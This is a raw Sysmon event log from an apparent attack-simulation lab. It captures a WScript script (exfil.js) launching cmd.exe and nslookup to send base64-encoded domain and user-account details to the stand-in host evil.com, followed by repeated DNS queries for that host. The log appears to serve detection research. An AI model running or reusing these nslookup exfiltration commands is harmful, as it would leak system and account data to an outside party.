14:16:38.838{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202483Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.838{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202482Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.838{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C6-629A-4B41-000000005F02}7344C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202481Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.838{2E1864BB-17C6-629A-4941-000000005F02}33846228C:\Windows\system32\cmd.exe{2E1864BB-17C6-629A-4B41-000000005F02}7344C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202480Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.846{2E1864BB-17C6-629A-4B41-000000005F02}7344C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C6-629A-4941-000000005F02}3384C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfkwuh.tmp 2>&1 10341000x8000000000000000202479Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.816{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C6-629A-4A41-000000005F02}4640C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202478Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.816{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C6-629A-4A41-000000005F02}4640C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202477Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.816{2E1864BB-17C6-629A-4A41-000000005F02}46407688C:\Windows\system32\conhost.exe{2E1864BB-17C6-629A-4941-000000005F02}3384C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202476Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.800{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C6-629A-4A41-000000005F02}4640C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202475Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.800{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202474Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.800{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202473Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.800{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202472Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.800{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202471Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.800{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C6-629A-4941-000000005F02}3384C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202470Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.800{2E1864BB-17A1-629A-783D-000000005F02}55527428C:\Windows\System32\WScript.exe{2E1864BB-17C6-629A-4941-000000005F02}3384C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202469Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.806{2E1864BB-17C6-629A-4941-000000005F02}3384C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfkwuh.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 22542200x8000000000000000202468Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.639{00000000-0000-0000-0000-000000000000}7836evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000202467Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.581{00000000-0000-0000-0000-000000000000}8160evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000202466Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.528{00000000-0000-0000-0000-000000000000}7528evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000202465Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.470{00000000-0000-0000-0000-000000000000}7668evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000202464Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.395{00000000-0000-0000-0000-000000000000}4712evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000202463Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.313{00000000-0000-0000-0000-000000000000}8108evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000202462Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.198{00000000-0000-0000-0000-000000000000}5708evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000202461Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.065{00000000-0000-0000-0000-000000000000}7468evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000202460Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.913{00000000-0000-0000-0000-000000000000}2736evil.com0::ffff:127.0.0.1;<unknown process> 354300x8000000000000000202459Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.395{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52911- 354300x8000000000000000202458Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.395{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52910- 354300x8000000000000000202457Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.393{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52909- 354300x8000000000000000202456Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.311{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52908- 354300x8000000000000000202455Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.311{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52907- 354300x8000000000000000202454Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.310{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52906- 354300x8000000000000000202453Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.197{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52905- 354300x8000000000000000202452Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.197{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52904- 354300x8000000000000000202451Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.196{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52903- 23542300x8000000000000000202450Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.800{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlqjru.tmpMD5=9C101754059B3D04F26CF3E2F51B88AA,SHA256=CC24D14F511AA03DA88D98786AE6BD9247656E6D05B1882F17E6E6D57E27DA80,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000202449Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.759{00000000-0000-0000-0000-000000000000}2604evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000202448Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.737{2E1864BB-17C6-629A-4741-000000005F02}58607508C:\Windows\system32\conhost.exe{2E1864BB-17C6-629A-4841-000000005F02}5568C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202447Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.737{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202446Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.737{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202445Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.737{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202444Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.737{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202443Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.737{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C6-629A-4841-000000005F02}5568C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202442Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.737{2E1864BB-17C6-629A-4641-000000005F02}50127440C:\Windows\system32\cmd.exe{2E1864BB-17C6-629A-4841-000000005F02}5568C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202441Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.737{2E1864BB-17C6-629A-4841-000000005F02}5568C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C6-629A-4641-000000005F02}5012C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqjru.tmp 2>&1 10341000x8000000000000000202440Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.714{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C6-629A-4741-000000005F02}5860C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202439Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 